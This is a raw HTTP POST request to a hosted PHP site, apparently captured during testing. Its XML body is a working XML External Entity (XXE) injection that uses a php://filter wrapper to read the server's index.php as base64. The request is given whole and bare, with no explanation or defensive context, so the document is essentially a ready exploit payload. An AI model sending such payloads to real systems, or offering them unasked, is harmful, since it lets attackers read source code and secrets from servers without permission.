POST /index.php HTTP/1.1
Host: music2blog23.000webhostapp.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 144

<?xml version="1.0"?>
		<!DOCTYPE replace [
		<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">]>
		<ss>&xxe;</ss>
